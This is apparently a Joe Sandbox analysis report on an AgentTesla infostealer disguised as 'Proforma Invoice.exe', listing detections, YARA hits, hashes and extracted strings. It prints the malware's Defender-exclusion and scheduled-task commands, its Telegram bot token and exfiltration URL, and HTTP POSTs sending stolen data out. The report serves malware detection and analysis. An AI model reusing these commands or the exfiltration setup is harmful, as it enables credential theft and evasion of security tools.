Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Proforma Invoice.exe

Overview

General Information

Sample Name:Proforma Invoice.exe
Analysis ID:668067
MD5:bea52e8910c076f5720ac20970e48a10
SHA1:42777245a3f79ea5b2bcf1ea48811111b1cc3529
SHA256:8d5f8190ec870db510d2b95b830a07bf3c67d9996df775778dfa82b6c2bdd7b3
Tags:exe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
.NET source code contains potential unpacker
Yara detected Generic Downloader
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Adds a directory exclusion to Windows Defender
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Proforma Invoice.exe (PID: 7152 cmdline: "C:\Users\user\Desktop\Proforma Invoice.exe" MD5: BEA52E8910C076F5720AC20970E48A10)
    • powershell.exe (PID: 2936 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ebJpPhiwjcAviB.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 6456 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ebJpPhiwjcAviB" /XML "C:\Users\user\AppData\Local\Temp\tmp8D30.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 3516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Proforma Invoice.exe (PID: 1500 cmdline: C:\Users\user\Desktop\Proforma Invoice.exe MD5: BEA52E8910C076F5720AC20970E48A10)
  • cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot5573921253:AAHXKq7lrmioCzUGP-9p7lopfbVX0A_ZdQA/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "5359531870", "Chat URL": "https://api.telegram.org/bot5573921253:AAHXKq7lrmioCzUGP-9p7lopfbVX0A_ZdQA/sendDocument"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.417720343.0000000002C24000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    00000000.00000002.416609324.00000000029D7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
      00000008.00000000.410969105.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000008.00000000.410969105.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000000.00000002.421261359.0000000004564000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 18 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            8.0.Proforma Invoice.exe.400000.8.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              8.0.Proforma Invoice.exe.400000.8.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                8.0.Proforma Invoice.exe.400000.8.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                  8.0.Proforma Invoice.exe.400000.8.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
                  • 0x32c49:$s10: logins
                  • 0x326b0:$s11: credential
                  • 0x2ebf0:$g1: get_Clipboard
                  • 0x2ebfe:$g2: get_Keyboard
                  • 0x2ec0b:$g3: get_Password
                  • 0x2fef9:$g4: get_CtrlKeyDown
                  • 0x2ff09:$g5: get_ShiftKeyDown
                  • 0x2ff1a:$g6: get_AltKeyDown
                  8.0.Proforma Invoice.exe.400000.10.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    Click to see the 37 entries

                    Sigma Signatures

                    No Sigma rule has matched

                    Snort Signatures

                    Timestamp:192.168.2.6149.154.167.220497814432851779 07/18/22-10:25:15.675809
                    SID:2851779
                    Source Port:49781
                    Destination Port:443
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Multi AV Scanner detection for submitted file
                    Source: Proforma Invoice.exeVirustotal: Detection: 31%Perma Link
                    Source: Proforma Invoice.exeMetadefender: Detection: 37%Perma Link
                    Source: Proforma Invoice.exeReversingLabs: Detection: 55%
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\ebJpPhiwjcAviB.exeMetadefender: Detection: 37%Perma Link
                    Source: C:\Users\user\AppData\Roaming\ebJpPhiwjcAviB.exeReversingLabs: Detection: 55%
                    Machine Learning detection for sample
                    Source: Proforma Invoice.exeJoe Sandbox ML: detected
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\ebJpPhiwjcAviB.exeJoe Sandbox ML: detected
                    Source: 8.2.Proforma Invoice.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                    Source: 8.0.Proforma Invoice.exe.400000.8.unpackAvira: Label: TR/Spy.Gen8
                    Source: 8.0.Proforma Invoice.exe.400000.6.unpackAvira: Label: TR/Spy.Gen8
                    Source: 8.0.Proforma Invoice.exe.400000.12.unpackAvira: Label: TR/Spy.Gen8
                    Source: 8.0.Proforma Invoice.exe.400000.10.unpackAvira: Label: TR/Spy.Gen8
                    Source: 8.0.Proforma Invoice.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                    Source: 0.2.Proforma Invoice.exe.459ae68.9.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "5359531870", "Chat URL": "https://api.telegram.org/bot5573921253:AAHXKq7lrmioCzUGP-9p7lopfbVX0A_ZdQA/sendDocument"}
                    Source: Proforma Invoice.exe.7152.0.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5573921253:AAHXKq7lrmioCzUGP-9p7lopfbVX0A_ZdQA/sendMessage"}
                    Source: Proforma Invoice.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49781 version: TLS 1.2
                    Source: Proforma Invoice.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Networking

                    barindex
                    Snort IDS alert for network traffic
                    Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.6:49781 -> 149.154.167.220:443
                    Uses the Telegram API (likely for C&C communication)
                    Source: unknownDNS query: name: api.telegram.org
                    Source: unknownDNS query: name: api.telegram.org
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 8.0.Proforma Invoice.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Proforma Invoice.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.Proforma Invoice.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Proforma Invoice.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Proforma Invoice.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Proforma Invoice.exe.45cf688.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Proforma Invoice.exe.459ae68.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Proforma Invoice.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Proforma Invoice.exe.4564848.10.raw.unpack, type: UNPACKEDPE
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: global trafficHTTP traffic detected: POST /bot5573921253:AAHXKq7lrmioCzUGP-9p7lopfbVX0A_ZdQA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da68ac1cc55b48Host: api.telegram.orgContent-Length: 1022Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /bot5573921253:AAHXKq7lrmioCzUGP-9p7lopfbVX0A_ZdQA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da68ad9679701fHost: api.telegram.orgContent-Length: 1900Expect: 100-continue
                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                    Source: Proforma Invoice.exe, 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                    Source: Proforma Invoice.exe, 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
                    Source: Proforma Invoice.exe, 00000008.00000002.642687799.0000000003255000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000003.453167723.0000000001254000.00000004.00000020.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000002.643016652.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000002.643092928.00000000032CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a7Yu7sNuvhjH4U.com
                    Source: Proforma Invoice.exe, 00000008.00000002.642687799.0000000003255000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a7Yu7sNuvhjH4U.comx
                    Source: Proforma Invoice.exeString found in binary or memory: http://api.eve-central.com/api/marketstat
                    Source: Proforma Invoice.exe, ebJpPhiwjcAviB.exe.0.drString found in binary or memory: http://api.eve-central.com/api/marketstatIDon
                    Source: Proforma Invoice.exe, ebJpPhiwjcAviB.exe.0.drString found in binary or memory: http://api.eve-online.com/
                    Source: Proforma Invoice.exe, 00000008.00000002.643272697.0000000003302000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000002.643092928.00000000032CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                    Source: ebJpPhiwjcAviB.exe.0.drString found in binary or memory: http://code.google.com/p/com232term
                    Source: Proforma Invoice.exe, 00000008.00000002.647450061.00000000068D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: Proforma Invoice.exe, 00000008.00000002.647093535.0000000006865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                    Source: Proforma Invoice.exe, 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://eIoKIh.com
                    Source: Proforma Invoice.exe, ebJpPhiwjcAviB.exe.0.drString found in binary or memory: http://eve.no-ip.de/prices/30d/
                    Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                    Source: ebJpPhiwjcAviB.exe.0.drString found in binary or memory: http://github.com/riuson/com232term
                    Source: Proforma Invoice.exe, 00000000.00000002.417720343.0000000002C24000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000000.00000002.416609324.00000000029D7000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000002.643035960.00000000032B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                    Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                    Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: Proforma Invoice.exe, 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%
                    Source: Proforma Invoice.exe, 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%%startupfolder%
                    Source: Proforma Invoice.exe, 00000008.00000002.643035960.00000000032B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                    Source: Proforma Invoice.exe, 00000000.00000002.421261359.0000000004564000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000000.410969105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000000.410130498.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5573921253:AAHXKq7lrmioCzUGP-9p7lopfbVX0A_ZdQA/
                    Source: Proforma Invoice.exe, 00000008.00000002.643035960.00000000032B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5573921253:AAHXKq7lrmioCzUGP-9p7lopfbVX0A_ZdQA/sendDocument
                    Source: Proforma Invoice.exe, 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5573921253:AAHXKq7lrmioCzUGP-9p7lopfbVX0A_ZdQA/sendDocumentdocument-----
                    Source: Proforma Invoice.exe, 00000008.00000002.643035960.00000000032B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org4
                    Source: Proforma Invoice.exe, 00000008.00000002.643272697.0000000003302000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.orgD8
                    Source: Proforma Invoice.exe, 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
                    Source: unknownHTTP traffic detected: POST /bot5573921253:AAHXKq7lrmioCzUGP-9p7lopfbVX0A_ZdQA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da68ac1cc55b48Host: api.telegram.orgContent-Length: 1022Expect: 100-continueConnection: Keep-Alive
                    Source: unknownDNS traffic detected: queries for: api.telegram.org
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49781 version: TLS 1.2

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 8.0.Proforma Invoice.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 8.0.Proforma Invoice.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.Proforma Invoice.exe.459ae68.9.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 8.2.Proforma Invoice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 8.0.Proforma Invoice.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 8.0.Proforma Invoice.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.Proforma Invoice.exe.45cf688.11.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.Proforma Invoice.exe.45cf688.11.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.Proforma Invoice.exe.459ae68.9.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 8.0.Proforma Invoice.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.Proforma Invoice.exe.4564848.10.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Initial sample is a PE file and has a suspicious name
                    Source: initial sampleStatic PE information: Filename: Proforma Invoice.exe
                    .NET source code contains very large array initializations
                    Source: 8.2.Proforma Invoice.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bFC196D4Eu002d8A43u002d4DC5u002dA5AEu002d085A2CD06847u007d/E9DED5F1u002dFF4Eu002d4645u002d84C8u002d74E99AE54950.csLarge array initialization: .cctor: array initializer size 11689
                    Source: 8.0.Proforma Invoice.exe.400000.8.unpack, u003cPrivateImplementationDetailsu003eu007bFC196D4Eu002d8A43u002d4DC5u002dA5AEu002d085A2CD06847u007d/E9DED5F1u002dFF4Eu002d4645u002d84C8u002d74E99AE54950.csLarge array initialization: .cctor: array initializer size 11689
                    Source: 8.0.Proforma Invoice.exe.400000.6.unpack, u003cPrivateImplementationDetailsu003eu007bFC196D4Eu002d8A43u002d4DC5u002dA5AEu002d085A2CD06847u007d/E9DED5F1u002dFF4Eu002d4645u002d84C8u002d74E99AE54950.csLarge array initialization: .cctor: array initializer size 11689
                    Source: Proforma Invoice.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: 8.0.Proforma Invoice.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 8.0.Proforma Invoice.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.Proforma Invoice.exe.459ae68.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 8.2.Proforma Invoice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 8.0.Proforma Invoice.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 8.0.Proforma Invoice.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.Proforma Invoice.exe.45cf688.11.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.Proforma Invoice.exe.45cf688.11.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.Proforma Invoice.exe.459ae68.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 8.0.Proforma Invoice.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.Proforma Invoice.exe.4564848.10.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_00F5DE440_2_00F5DE44
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_053F25500_2_053F2550
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_053F25400_2_053F2540
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_053F55F80_2_053F55F8
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_053F55E80_2_053F55E8
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_053F84040_2_053F8404
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_053F67100_2_053F6710
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_053F67000_2_053F6700
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_053F61700_2_053F6170
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_053F11600_2_053F1160
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_053F61600_2_053F6160
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_053F11510_2_053F1151
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_053F92300_2_053F9230
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_053F72960_2_053F7296
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_053F72800_2_053F7280
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_053F72D80_2_053F72D8
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_053F4D180_2_053F4D18
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_053F4D080_2_053F4D08
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_053F3DA80_2_053F3DA8
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_053F3D9A0_2_053F3D9A
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_053F5C180_2_053F5C18
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_053F5C0A0_2_053F5C0A
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_053F1C070_2_053F1C07
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_053F6C780_2_053F6C78
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_053F6C680_2_053F6C68
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_053F1CB00_2_053F1CB0
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_053F2F000_2_053F2F00
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_053F5FD00_2_053F5FD0
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_053F5FC00_2_053F5FC0
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 0_2_053F2EF00_2_053F2EF0
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 8_2_0678B7388_2_0678B738
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 8_2_067858688_2_06785868
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 8_2_06788CF48_2_06788CF4
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 8_2_0678E1D88_2_0678E1D8
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 8_2_067878408_2_06787840
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 8_2_067D76E88_2_067D76E8
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 8_2_067DD8088_2_067DD808
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 8_2_067D28C08_2_067D28C0
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 8_2_067D2D0A8_2_067D2D0A
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 8_2_067D7E988_2_067D7E98
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 8_2_067D7F388_2_067D7F38
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 8_2_067DACE08_2_067DACE0
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeCode function: 8_2_067DAC808_2_067DAC80
